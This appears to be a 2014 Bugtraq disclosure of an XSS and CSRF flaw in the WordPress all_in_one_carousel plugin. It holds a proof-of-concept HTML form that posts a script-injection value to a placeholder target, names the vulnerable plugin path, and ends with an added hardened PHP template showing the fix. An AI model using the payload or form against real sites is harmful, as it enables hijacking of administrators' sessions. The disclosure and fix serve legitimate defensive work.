Message-Id: <201402100725.s1A7PrXG009527@sf01web1.securityfocus.com>
Date: Mon, 10 Feb 2014 07:25:53 GMT
From: iedb.team@...il.com
To: bugtraq@...urityfocus.com
Subject: Wordpress all_in_one_carousel Plugin /XSS/CSRF/ Vuln





#  Exploit :


<center><b>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability

</center><br><br>
<html>
<head>
<title>Wordpress all_in_one_carousel Plugin Xss & Csrf Vulnerability   [IeDb TeaM]</title>
</head><body>
<form
action=\"http://YourTarget.Com\"
id=\"formid\" method=\"post\">

<input name=\"name\" value=\'\"><script>alert(/IeDb.ir/)</script>\' /><br><br>
<input type=\"submit\" value=\"Submit\"/>
</form></body></html>

#
#  XSS Code : \"><script>alert(/IeDb.ir/)</script>
#
#  Vulnerable Page :
#
#       Localhost/[AnyPath]/wp-content/plugins/all_in_one_carousel/tpl/add_carousel.php
#
#
#   [+] Image : http://sectime.ir/myfiles/Xss-wp.png
#
#
#
# D3m0 :
#
#


#
#
# Gr33tz : All Members In IeDb.Ir/acc  |  Thanks : 8ThBit , Dr.3v1l And ....


###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-02-04]

###########################
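
How a WordPress admin template of this kind can be written so that neither the direct POST nor the reflected `name` value in the proof of concept above works. This is an added example, not part of the original post and not the plugin's code. It assumes the template echoes the posted `name` field back into an input's value attribute; the `aioc_add_carousel` action and `aioc_nonce` field names are hypothetical.

```php
<?php
// Added example: hypothetical hardened template, not the plugin's own code.
// Assumption: the page reflects the posted "name" field into the form.

// 1. Refuse direct requests to the file under wp-content/plugins/.
//    ABSPATH is defined only when WordPress itself has loaded this file.
if ( ! defined( 'ABSPATH' ) ) {
    http_response_code( 403 );
    exit;
}

// 2. Only a logged-in administrator may reach the form.
if ( ! current_user_can( 'manage_options' ) ) {
    wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
}

$name = '';
if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
    // 3. CSRF: abort unless the POST carries the nonce issued by the form
    //    below (hypothetical action and field names).
    check_admin_referer( 'aioc_add_carousel', 'aioc_nonce' );

    // 4. Input: undo WordPress slashing, then strip tags and control chars.
    $name = isset( $_POST['name'] )
        ? sanitize_text_field( wp_unslash( $_POST['name'] ) )
        : '';
    // ... persist $name here ...
}
?>
<form method="post">
    <?php wp_nonce_field( 'aioc_add_carousel', 'aioc_nonce' ); ?>
    <!-- 5. Output: esc_attr() encodes quotes and angle brackets, so the
         value cannot close the attribute and start new markup. -->
    <input name="name" value="<?php echo esc_attr( $name ); ?>" />
    <input type="submit" value="Submit" />
</form>
```

Step 1 alone closes the path listed under "Vulnerable Page", because the template is then reachable only through the WordPress admin screen that includes it.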
